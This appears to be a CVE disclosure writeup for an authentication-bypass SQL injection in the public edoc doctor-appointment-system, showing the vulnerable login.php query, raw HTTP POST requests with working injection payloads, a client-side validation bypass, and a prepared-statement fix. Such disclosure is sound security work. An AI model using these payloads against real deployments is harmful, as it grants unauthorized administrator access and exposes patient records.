# CVE-2025-63436: Authentication Bypass via SQL injection - edoc doctor-appointment-system

Link : https://github.com/HashenUdara/edoc-doctor-appointment-system

## Identification & Exploitation

From reviewing the source code I identified this from `login.php`:

![image](https://hackmd.io/_uploads/SyeSJJeQ8ll.png)

![image](https://hackmd.io/_uploads/BkB96yXUeg.png)

First we have to bypass this restriction (it is only a client-side restriction: we can simply open devtools and change the `type` attribute of the input from `email` to `text`):

![image](https://hackmd.io/_uploads/S1DxAkmUex.png)

Initially it was `email`; we changed it to `text`, allowing us to send any input:

![image](https://hackmd.io/_uploads/BJuXR17Ueg.png)

```http
POST /login.php HTTP/1.1
Host: localhost:8083
Content-Length: 102
Accept-Language: en-US,en;q=0.9
Origin: http://localhost:8083
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost:8083/login.php
Accept-Encoding: gzip, deflate, br
Cookie: username=jojo; session=1a7c29922727a41737aa95b11c3efb960e5ee8afb367aa21a6e5b1d5775ab92b; PHPSESSID=ccfa7791ebb5302c3aeac5b7a505db62
Connection: keep-alive

useremail=admin%40edoc.com%27+or+1%3D1+limit+1+--&userpassword=admin%40edoc.com%27+or+1%3D1+limit+1+--
```

We receive a blank page, but the error output we get confirms that this is a SQL injection: the submitted value reaches the query unsanitized.
![image](https://hackmd.io/_uploads/SJa5RkXLgl.png)

But that didn't work, because the logic is to first check if the user exists and what type of user it is:

```php
$result= $database->query("select * from webuser where email='$email'");
```

Now with the payload `' OR '1'='1' limit 1 #--` I was able to bypass authentication completely and log in as the administrator!

![image](https://hackmd.io/_uploads/SJH2Xe7Lgl.png)

Below is a raw HTTP request:

```http
POST /login.php?action=logout HTTP/1.1
Host: localhost:8083
Content-Length: 66
Origin: http://localhost:8083
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: keep-alive

useremail=%27+OR+%271%27%3D%271%27+limit+1+%23--&userpassword=test
```
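As an added example (not the project's own code), the vulnerable `webuser` lookup quoted above is shown next to a hardened version that uses a mysqli prepared statement and re-validates the email server side; it assumes `$database` is a `mysqli` connection with the mysqlnd driver, and the `password` and `usertype` column names are assumptions, since only `email` appears in the original query.

```php
<?php
// Added example: the vulnerable lookup from login.php beside a hardened version.
// Assumes $database is a mysqli connection (mysqlnd driver, for get_result());
// column names other than `email` (password, usertype) are assumptions.

// VULNERABLE: $email is concatenated straight into the SQL text, so a value
// containing a quote and a comment marker rewrites the WHERE clause and the
// query returns a row that does not belong to the email the user supplied.
function lookup_user_vulnerable(mysqli $database, string $email): ?array
{
    $result = $database->query("select * from webuser where email='$email'");
    return $result ? ($result->fetch_assoc() ?: null) : null;
}

// HARDENED: the SQL text and the value travel separately, so quote and comment
// characters inside $email are compared as data, never parsed as SQL.
// A row comes back only for an exact match on the email column.
function lookup_user_safe(mysqli $database, string $email): ?array
{
    $stmt = $database->prepare(
        "SELECT email, password, usertype FROM webuser WHERE email = ?"
    );
    $stmt->bind_param("s", $email);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Server-side validation plus a hashed password check; the type="email"
// attribute on the form is client-side only, as the writeup shows.
function authenticate(mysqli $database, string $email, string $password): ?array
{
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    $user = lookup_user_safe($database, $email);
    if ($user === null || !password_verify($password, $user['password'])) {
        return null;
    }
    return $user;
}
```

With the prepared statement in place, the `' OR '1'='1' limit 1 #--` value from the request above is looked up literally as an email address and matches no row.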